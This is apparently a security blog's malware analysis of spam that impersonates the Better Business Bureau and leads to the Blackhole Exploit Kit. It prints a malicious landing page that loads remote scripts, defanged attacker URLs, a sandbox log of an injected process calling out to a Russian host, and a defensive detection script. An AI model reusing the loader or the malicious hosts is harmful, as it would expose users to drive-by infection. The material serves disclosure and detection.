We have received various spam emails that impersonate messages from the Better Business Bureau (BBB) but in reality are used to spread malicious links that lead to the Blackhole Exploit Kit. The subject of the emails looks like this:
Your updated information is necessary
A screenshot of the email:
Other details of the emails:
Return-Path: <top-team3@ms16.hinet.net>
Received: from msr6.hinet.net (msr6.hinet.net [168.95.4.106])
Received: from ms16.hinet.net ([178.206.55.126])
Date: Thu, 26 Jan 2012 22:49:15 +1000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.7) Gecko/20100713 Lightning/1.0b2 Thunderbird/3.1.1
Subject: Your updated information is necessary
The link present in the email:
hxxp://app.alaskaoregonwe sternwashington.bbb.org/sbq
Redirects users to the malicious link:
hxxp://circutor .com/4ethe8ep/index.html
The dumped content of the malicious link is:
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://diamondservice.com .au/B0bifDVW/js.js"></script>
<script type="text/javascript" src="hxxp://therefugees.altervista .org/wqWcKZ8w/js.js"></script>
<script type="text/javascript" src="hxxp://www.rentacandle.com .au/4SvXUuz4/js.js"></script>
</html>
Extracted malicious links (active as of now) that lead to Blackhole Exploit Kit are:
hxxp://diamondservice.com .au/B0bifDVW/js.js
hxxp://www.rentacandle.com .au/4SvXUuz4/js.js
We have analyzed the malicious link with our sandbox, and this is the report:
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 213.229.188.210 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - circutor .com - /4ethe8ep/index.html
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 203.210.112.33 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - diamondservice .com.au - /B0bifDVW/js.js
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\8YPELNXD\js[1].js - 7A6BC5BCB465D4C54CA3D185FD5D45F0 - 75 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 50.116.33.235 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron .com - /search.php?page=ac2393a35636dfa1
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\VBPHH91D\search[1].htm - D2EE09D5DBE3B22B66CFF67B81999E55 - 2048 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 65.55.13.243 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - activex.microsoft .com - /objects/ocget.dll
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache\N6MCDZF7
File Modified - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\LOCALS~1\Temp\java_install_reg.log
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %Temp%\hsperfdata_%UserName%\856 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Sun\Java\Deployment\deployment.properties - 2EDE01E8DF28D3DC2BF961089BC9A241 - 635 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 64.4.52.169 - 80
Process Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %ProgramFiles%\Java\jre6\bin\java.exe - Sun Microsystems, Inc. - D600A0D8FACA5158CA8B221006997808 - 144792 bytes
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - codecs.microsoft .com - /isapi/ocget.dll
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\hsperfdata_%UserName%\2016 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\java_install_reg.log
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [-normal] - -
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java\Deployment
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\log
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\security
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\ext
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\cache\6.0\tmp
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\deployment.properties - NOTHING TO HASH - 0 bytes - attr: [] - -
Process Created - C:\WINDOWS\explorer.exe - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - Microsoft Corporation - 55794B97A7FAABD2910873C85274F409 - 93184 bytes
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat - C9508CA14563A81666441FF191D9BB24 - 664 bytes - attr: [] - -
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012010920120116\
File Deleted - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\index.dat - 32768 bytes
Directory Removed - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012012820120129\
Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php
Process Created - C:\WINDOWS\explorer.exe - C:\WINDOWS\system32\verclsid.exe - Microsoft Corporation - 91790D6749EBED90E2C40479C0A91879 - 28672 bytes
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects\FMGLCCCK
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron.com - /content/field.swf
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\G55SBTS1\field[1].swf - 2435793EE73EFDAF79541977B3C08EEB - 1490 bytes - attr: [] - -
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 5152
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 1079
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.12.249 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - www.microsoft .com - /isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.206.209 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - home.microsoft .com - /
Connection Established - C:\WINDOWS\explorer.exe - TCP - 94.245.115.205 - 80
Connection Established - %ProgramFiles%\Java\jre6\bin\java.exe - TCP - 50.116.33.235 - 80
Malicious URLs extracted:
diamondservice .com.au - /B0bifDVW/js.js
matorbaron .com - /search.php?page=ac2393a35636dfa1
kosmovodki .ru - /statnl/image.php
matorbaron .com - /content/field.swf
As we can see, malicious code has been injected into the system process wuauclt.exe:
Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php
Blackhole exploit kit requests:
matorbaron .com - /search.php?page=ac2393a35636dfa1
matorbaron .com - /content/field.swf
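The three tell-tale events in the report above (the Blackhole landing page request, the browser spawning java.exe, and a Windows Update client talking to a non-Microsoft host) can be picked out of this sandbox format automatically. The following triage script is an added example, not code from the original post or from the sandbox vendor; the sample lines are constructed from entries in the report, the browser list and the trusted-host suffix are assumptions, and the landing-page regex generalises the single /search.php?page=... value seen here.

```python
import re

# Sample sandbox events in the "Event - Process - details" layout of the report above
# (constructed for this example from entries in that report).
SAMPLE_EVENTS = [
    r"Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron.com - /search.php?page=ac2393a35636dfa1",
    r"Process Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %ProgramFiles%\Java\jre6\bin\java.exe - Sun Microsystems, Inc. - D600A0D8FACA5158CA8B221006997808 - 144792 bytes",
    r"Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron.com - /content/field.swf",
    r"Web Request - C:\WINDOWS\explorer.exe - GET - home.microsoft.com - /",
    r"Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki.ru - /statnl/image.php",
]

BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}      # assumption: processes expected to browse
TRUSTED_HOST_SUFFIXES = (".microsoft.com",)                    # assumption: hosts system processes may reach
# Blackhole landing-page shape seen in the report: /search.php?page=<16 hex chars>
BLACKHOLE_LANDING = re.compile(r"^/search\.php\?page=[0-9a-f]{16}$")

def parse_event(line):
    """Split one report line into event type, acting process and the remaining fields."""
    fields = [f.strip() for f in line.split(" - ")]
    return {"event": fields[0], "process": fields[1], "details": fields[2:]}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def flag_event(ev):
    """Return the reasons one parsed event looks like exploit-kit activity (empty list if none)."""
    proc = basename(ev["process"])
    reasons = []
    if ev["event"] == "Web Request":
        method, host, path = ev["details"][:3]
        if BLACKHOLE_LANDING.match(path):
            reasons.append(f"Blackhole-style landing page requested: {host}{path}")
        if proc not in BROWSERS and not host.endswith(TRUSTED_HOST_SUFFIXES):
            reasons.append(f"non-browser process {proc} made a {method} request to {host} (possible injected code)")
    elif ev["event"] == "Process Created":
        child = basename(ev["details"][0])
        if proc in BROWSERS and child == "java.exe":
            reasons.append(f"{proc} spawned {child}: Java plugin launched from the browser")
    return reasons

def triage(lines):
    """Map the index of each suspicious line to the reasons it was flagged."""
    result = {}
    for i, line in enumerate(lines):
        reasons = flag_event(parse_event(line))
        if reasons:
            result[i] = reasons
    return result

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(idx, *reasons, sep="\n  ")
```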
Download dumped network traffic (password is urlvoid.com):